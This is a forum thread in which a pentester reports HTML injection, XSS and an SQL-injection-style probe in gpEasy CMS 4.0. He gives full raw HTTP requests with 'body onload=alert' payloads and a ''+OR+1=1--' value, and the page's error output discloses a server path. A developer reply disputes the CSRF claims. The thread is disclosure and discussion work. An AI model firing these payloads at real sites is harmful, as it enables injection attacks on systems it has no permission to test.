Topic Closed

Hi gpEasy Team, and all members of this forum.

 

In my day to day work, I'm doing a lot of pentests and code review. Mostly related to webapps because this is the 'first stage'

in a way 'customer <-> company'. After work, I'm goin home, and ... I'm doing a lot of pentests and code review, but this time only 'for me'

(like you can check at my blog when few ideas are described).

 

Yesterday I found that gpEasy is available for download in a new version (4.0) and I decide to check it.

I must say that I was very surprised that you have blocked most of payloads for XSS and SQLi attacks. But... ;]

I found it anyway and that's how I found this forum (this time I decide to post information 'first to you' not at my blog,

like it was for version before http://hauntit.blogspot.com/2013/04/gpeasy-36-html-injection.html ).

 

So. I found few vulnerabilities in latest release. All were tested for admin logged-in so I suppose there could be a potential risk

of CSRF attack (I didn't check it yet, so please think about it).

1. html injection is possible:


POST /kuba/gpEasy4.0/gpEasy/index.php/Admin_Extra?gpreq=json&jsoncallback=jQuery183029823558424143826_1369418635239 HTTP/1.1
Host: 192.168.1.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.101/kuba/gpEasy4.0/gpEasy/index.php/Admin_Extra
Content-Length: 198
Cookie: lang=en; lang=en; gpEasy_a1a985378d83=aNKzZKyH2iITzVb8Md5DMSg8isb2Cc5dlkkQ9Tgh
Connection: close
Pragma: no-cache
Cache-Control: no-cache

cmd=new_section&file=aaaaaaaaaaaa&type=<h1>aaaaaaaaaaaaaaaaaaaaaaaa<br>bbbbbbbbbbbbbbbbbbb</h1>&verified=95027f35b0&verified=95027f35b0&verified=95027f35b0&=Add%20New%20Area


response:

(...)

md=delete&amp;file=%60__%21%40%24%25%5E&amp;%28%29_%20%7D%7B=%5B%5D%3B%23alert%284321%29\" data-cmd=\"postlink\" title=\"Are you sure you want to permanently remove `[email protected]$%^&amp;()_+}{=[];#alert(4321)? \" class=\"gpconfirm\" data-nonce=\"95027f35b0\">Delete</a></td></tr><tr class=\"even\"><td style=\"white-space:nowrap\">aaaaaaaaaaaa</td><td><h1>aaaaaaaaaaaaaaaaaaaaaaaa<br>bbbbbbbbbbbbbbbbbbb</h1></td><td>\"<span class=\"admin_note\">New Section</span>...\"</td><td style=\"white-space:nowrap\"><a href=\"/kuba/gpEasy4.0/gpEasy/index.php/Admin_Extra?cmd=view&amp;file=aaaaaaaaaaaa\" title=\"Preview\">Preview</a> &nbsp; <a href=\"/kuba/gpEasy4.0/gpEasy/index.php/Admin_Extra?cmd=delete&amp;file=aaaaaaaaaaaa\" data-cmd=\"postlink\" title=\"Are you sure you want to permanently remove aaaaaa
(...)


2.

xss is possible:

POST /kuba/gpEasy4.0/gpEasy/index.php/Admin_Extra?gpreq=json&jsoncallback=jQuery183029823558424143826_1369418635239 HTTP/1.1
Host: 192.168.1.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.101/kuba/gpEasy4.0/gpEasy/index.php/Admin_Extra
Content-Length: 190
Cookie: lang=en; lang=en; gpEasy_a1a985378d83=aNKzZKyH2iITzVb8Md5DMSg8isb2Cc5dlkkQ9Tgh
Connection: close
Pragma: no-cache
Cache-Control: no-cache

cmd=new_section&file=aaaaaaaaaaaa&type=<h1>aaaaaaaaaaaaaaaa<body onload=alert(/x/)>a<br>bbbbbbbbbbbbbbbbbbb</h1>&verified=95027f35b0&verified=95027f35b0&verified=95027f35b0&=Add%20New%20Area

(the same place, but different payload)

response:
(...)
>Delete</a></td></tr><tr class=\"even\"><td style=\"white-space:nowrap\">aaaaaaaaaaaa</td><td><h1>aaaaaaaaaaaaaaaa<body onload=alert(/x/)>a<br>bbbbbbbbbbbbbbbbbbb</h1></td><td>\"<span class=\"admin_note\">New Section</span>...\"</td><td style=\"white-space:nowrap\"><a href=\"/kuba/gpEasy4.0/gpE

(...)


3.

xss again:

POST /kuba/gpEasy4.0/gpEasy/index.php/Admin_Extra?gpreq=json&jsoncallback=jQuery183029823558424143826_1369418635239 HTTP/1.1
Host: 192.168.1.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.101/kuba/gpEasy4.0/gpEasy/index.php/Admin_Extra
Content-Length: 164
Cookie: lang=en; lang=en; gpEasy_a1a985378d83=aNKzZKyH2iITzVb8Md5DMSg8isb2Cc5dlkkQ9Tgh
Connection: close
Pragma: no-cache
Cache-Control: no-cache

cmd=new_section&file=aaaaaaaaaaaa&type='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&verified=95027f35b0&verified=95027f35b0&verified=95027f35b0&=Add%20New%20Area


(response wil be similar).

 

4. (and 5) - I think it could be a "bug" only, anyway, below is detailed information:

500 error:

POST /kuba/gpEasy4.0/gpEasy/index.php/Admin_Configuration?gpreq=json&jsoncallback=jQuery183008074821283823352_1369418498905 HTTP/1.1
Host: 192.168.1.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.101/kuba/gpEasy4.0/gpEasy/index.php/Admin_Menu?menu=%27%22%60%3e%3c%[email protected]$%^%26%2a()_%2b}{%3d[]%27%3b
Content-Length: 961
Cookie: lang=en; lang=en; gpEasy_a1a985378d83=aNKzZKyH2iITzVb8Md5DMSg8isb2Cc5dlkkQ9Tgh
Connection: close
Pragma: no-cache
Cache-Control: no-cache

title=My+gpEasy+CMS&keywords=gpEasy+CMS%2C+Easy+CMS%2C+Content+Management%2C+PHP%2C+Free+CMS%2C+Website+builder%2C+Open+Source&desc=A+new+gpEasy+CMS+installation.+You+can+change+your+site's+description+in+the+configuration.&colorbox_style=example1&language=en&langeditor=inherit&showsitemap=false&showsitemap=true&showlogin=false&showlogin=true&showgplink=false&showgplink=true&jquery=local&maximgarea=691200&maxthumbsize=100&auto_redir=90&HTML_Tidy='%2bOR%2b1%3d1--&Report_Errors=false&combinejs=false&combinejs=true&combinecss=false&combinecss=true&etag_headers=false&etag_headers=true&resize_images=false&resize_images=true&toemail=admin%40here.com&toname=&from_address=AutomatedSender%40192.168.1.101&from_name=Automated+Sender&from_use_user=false&require_email=&mail_method=mail&sendmail_path=&smtp_hosts=&smtp_user=&smtp_pass=&recaptcha_public=&recaptcha_private=&recaptcha_language=inherit&cmd=save_config&verified=95027f35b0&verified=95027f35b0&aaa=Save

 

response:

HTTP/1.0 500 Internal Server Error
Date: Fri, 24 May 2013 18:07:02 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.4.6-1ubuntu1.2
Last-Modified: Fri, 24 May 2013 18:07:02 GMT
Expires: Fri, 24 May 2013 18:07:02 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 764
Connection: close
Content-Type: text/html; charset=utf-8

<p>Oops, an error occurred while generating this page.<p><h3>Error Details</h3><pre>array(
   [type] =&gt; (integer)4
   [message] =&gt; (string)syntax error, unexpected ''in' (T_ENCAPSED_AND_WHITESPACE)
   [file] =&gt; (string)/home/kuba/public_html/gpEasy4.0/gpEasy/data/_site/config.php
   [line] =&gt; (integer)92
   [request] =&gt; (string)/kuba/gpEasy4.0/gpEasy/index.php/Admin_Configuration?gpreq=json&amp;jsoncallback=jQuery183008074821283823352_1369418498905
   [time] =&gt; (integer)1369418822
   [request_method] =&gt; (string)POST
   [file_modified] =&gt; (integer)1369418822
   [file_size] =&gt; (integer)3082
)</pre><p><a href="">Reload this page</a></p><p style="font-size:90%">Note: Error details are only displayed for logged in administrators</p>


so as you can see, there is a information disclosure bug.

Another one case looks like this:


POST /kuba/gpEasy4.0/gpEasy/index.php/Admin_Configuration?gpreq=json&jsoncallback=jQuery183008074821283823352_1369418498905 HTTP/1.1
Host: 192.168.1.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.101/kuba/gpEasy4.0/gpEasy/index.php/Admin_Menu?menu=%27%22%60%3e%3c%[email protected]$%^%26%2a()_%2b}{%3d[]%27%3b
Content-Length: 1052
Cookie: lang=en; lang=en; gpEasy_a1a985378d83=aNKzZKyH2iITzVb8Md5DMSg8isb2Cc5dlkkQ9Tgh
Connection: close
Pragma: no-cache
Cache-Control: no-cache

title=My+gpEasy+CMS&keywords=gpEasy+CMS%2C+Easy+CMS%2C+Content+Management%2C+PHP%2C+Free+CMS%2C+Website+builder%2C+Open+Source&desc=A+new+gpEasy+CMS+installation.+You+can+change+your+site's+description+in+the+configuration.&colorbox_style=example1&language=en&langeditor=inherit&showsitemap=false&showsitemap=true&showlogin=false&showlogin=true&showgplink=false&showgplink=true&jquery=local&maximgarea=691200&maxthumbsize=100&auto_redir=90&HTML_Tidy=&Report_Errors=false&combinejs=false&combinejs=true&combinecss=false&combinecss=true&etag_headers=false&etag_headers=t

Edited: 4 years ago#6023

ups... my message was too long, and was cutted in some way :)

Ok, so:

I think you've don great job here (in 4.0 release). Keep going! :)

In case of filtering - IHMO you can check how phpMyAdmin done that, they do an excellent job.

Also, maybe think about whitelists (not blacklists, because adding '+' to tags like script will not make your code secure.

Attacks depends of imagination of attacker, so he will always find a way to iput payload, even if you will ad 4++++ there ;P )

If you have any questions, or just want to talk, you can find my email here, or at my blog, so feel free to write to me.

I will answer as soon as possible.

 

Best regards,

Jakub

4 years ago#6024

jogai
264 Posts

So you're saying that a logged in admin can post html? Well, its the freaking job of a cms to let that happen. Sure an admin can make xss attacks this way. Everyone that runs a site can.

Also you're referring to phpMyAdmin. That shit is vulnarable as hell.

If you're really concerned, you should've mailed the author directly. This forum is open to everyone thus not so different than posting on your 'security blog'. On this forum are users of gpEasy who might get anxious about this without reason.

4 years ago#6028

Josh S.
2K Posts
235K Downloads
16 Themes
18 Plugins

Hi Jakub,

Thanks for running pentests for gpEasy on your spare time.  There's no such thing as too much testing, especially security related testing. I haven't had a chance to read through everything you posted yet, but I will as soon as I have time.

-Josh

4 years ago#6030

Great Josh :)

 

If you have any questons, let me know. Maybe I can help you with patching for new release. ;)

 

Regards,

Jakub

4 years ago#6032

jogai: yes, I'm saying that admin can send 'html' if he is logged in. try to put <script>alert(/jogai/)</script> if this is so fucking simple in 4.0 version. ;)

second thing, show me some csrf-protection in 4.0 version.

3rd thing: read few words here http://en.wikipedia.org/wiki/Responsible_disclosure. and to your 'send directly to admin': I didn't find 'his email' at readme as also at this page, so I decide to post it here to 'get to know' to all community (I suppose here I will find some developers of this cms).

in case of phpMyAdmin, I don't think they have shitty code. I'm checking their code since version 2.x and from version to version they gets much better, that's why this was an example to check 'how they do it' and think about similar filters in gpEasy.

4rt: thanks for watching my 'security blog'. ;)

take care o/

4 years ago#6034

Josh S.
2K Posts
235K Downloads
16 Themes
18 Plugins

Maybe I can help you with patching for new release. ;)

Definitely not going to say "no" to that

4 years ago#6047

Josh S.
2K Posts
235K Downloads
16 Themes
18 Plugins

show me some csrf-protection

For some time, gpEasy has used nonces to verify POST requests (see the 'verified' value in your examples). Do you feel like our nonce implemenation isn't secure enough?

4 years ago#6060

jogai
264 Posts

Responsible disclosure: I think its easy enough to find Josh's contact information to disclose this first to him. He's a nice person and certainly would've given you full credit for finding these bugs. The release cycles are usually short so you wouldnt have to wait long before publishing this anywhere after it was patched. The community is not that big and the uninformed may now think gpEasy is not safe to use. 

The amount of 0day posts on your blog is too damn high!  Thats not Responsible disclosure, thats just disclosure.

I still think phpMyAdmin is crap considering security. I dont think they've shitty code, but security is easy to do wrong.

 

4 years ago#6061

jogai: thanks for reading all content at my blog, really impresinve. ;]

if you asked, I'm doing pentests and code review since 15 years.
not all '0day' can be published because few o them are sold in bugbounty, etc.

I'm will be very very glad to reading your blog. I'm always looking for a good place to learn. Anyway: all right! your dick is bigger, you're the mastah of h4ckth3pl4n3t.


ad. pma - you can think they have 'crap', what ever dude. I'm working with them sometimes, reporting them bugs/vulns, adn they have one of fastests responses I've ever seen. they're always kind and want to cooperate. any vuln/bug detailed them, is considered and as a friendly cooperate patch is creating.

anyway, you discouraged me so much from this forum and cms, that I will stay with pma.

 

thanks Josh S. It was a pleasure ;)

cheers o/

4 years ago#6065

jogai
264 Posts

I didn't read it all. just made a quick count. And I don't have a blog myself and even if I did it wouldn't be about pentesting or anything security related. I didn't even say I was a master of anything. I just had a problem with the early and open disclosure.

And since you brought it up; Yours is apparently bigger because I stepped on it.. :-)

Josh is also very kind (although he'll be probably mad at me now) and wants to cooperate. You shouldn't let a random forum user (me) scare you so easily away.

For the record, i'm not affiliated in any way with gpEasy. I'm not even registered as service provider.

 

4 years ago#6068

Josh S.
2K Posts
235K Downloads
16 Themes
18 Plugins

Just following up here on the status of these bug reports.

Jakub claimed that gpEasy was vulnerable to multiple CSRF attacks and claimed gpEasy lacked any CSRF protection. The fact is, gpEasy does protect against CSRF. gpEasy verifies every single POST request with a constantly changing and installation specific nonce. My guess is that Jakub was able to hack his installation, because he copied the correct nonce for his site into his attack code.

Unfortunately, we weren't able to discuss this any further. Jogai, I really appreciate your enthusiasm for gpEasy, but let's keep it civil in the forums.

4 years ago#6158

jogai
264 Posts

Sorry about that; Sometimes I have the urge to answer BS in a Sh*tty way.. I'll try to keep this corner of the internet more civil in the future.

Happy to hear that gpEasy isnt open to these vulnerabilities!

4 years ago#6168

Topic Closed

 

News

Typesetter 5.1
8/12/2017

Typesetter 5.0.1 is now available for download. 5.1 includes bug fixes, UI/UX improvements, ... Read More

Over 8 Times Faster Than Wordpress
5/3/2016

We've known for a long time that Typesetter is fast. It's something we take pride ... Read More

More News

creisi productions

Dienstleistungen von creisi productions, Luzern (Schweiz): Konzeption, Planung und Erstellung Ihres Internet-Auftritts, Betreuung und Aktualisierung Ihrer Website, Programmierun...

Find out more about our Provider Spotlight

Log In

  Register